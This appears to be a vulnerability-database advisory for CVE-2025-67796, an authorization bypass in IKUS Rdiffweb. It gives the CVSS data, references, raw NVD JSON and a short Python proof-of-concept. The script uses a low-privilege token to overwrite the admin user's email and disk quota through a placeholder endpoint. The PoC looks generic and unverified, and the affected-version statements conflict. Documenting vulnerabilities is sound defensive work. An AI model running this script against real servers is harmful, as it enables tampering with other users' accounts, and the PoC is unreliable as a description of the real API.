CVE-2025-67796

Description

IKUS Rdiffweb before 2.10.5 has an improper authorization flaw that allows an attacker with any valid or stolen access token to act as other users. The API does not enforce binding between the authenticated subject and the targeted user/tenant, so crafted requests can read or modify other users data and, in some cases, perform privileged actions. This issue may enable cross-tenant access. Fixed in version 2.10.6.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

IKUS Rdiffweb < 2.10.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target configuration target_url = "http://vulnerable-host/api/users/settings" attacker_token = "VALID_LOW_PRIVILEGE_TOKEN_HERE" # Headers with the stolen or valid token headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # Payload attempting to modify another user's data (IDOR) # The attacker changes the 'username' field to target a different user malicious_payload = { "username": "admin", # Target user to impersonate "email": "[email protected]", "disk_quota": "0" } try: # Send the crafted request response = requests.post(target_url, headers=headers, json=malicious_payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! User data modified via authorization bypass.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67796
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67796
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67796/
[4] VulDB https://vuldb.com/cve/CVE-2025-67796
[5] https://gitlab.com/ikus-soft/rdiffweb
[6] https://gitlab.com/ikus-soft/rdiffweb#2106-2025-10-02

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67796", "sourceIdentifier": "[email protected]", "published": "2026-05-04T20:16:16.260", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "IKUS Rdiffweb before 2.10.5 has an improper authorization flaw that allows an attacker with any valid or stolen access token to act as other users. The API does not enforce binding between the authenticated subject and the targeted user/tenant, so crafted requests can read or modify other users data and, in some cases, perform privileged actions. This issue may enable cross-tenant access. Fixed in version 2.10.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://gitlab.com/ikus-soft/rdiffweb", "source": "[email protected]"}, {"url": "https://gitlab.com/ikus-soft/rdiffweb#2106-2025-10-02", "source": "[email protected]"}]}}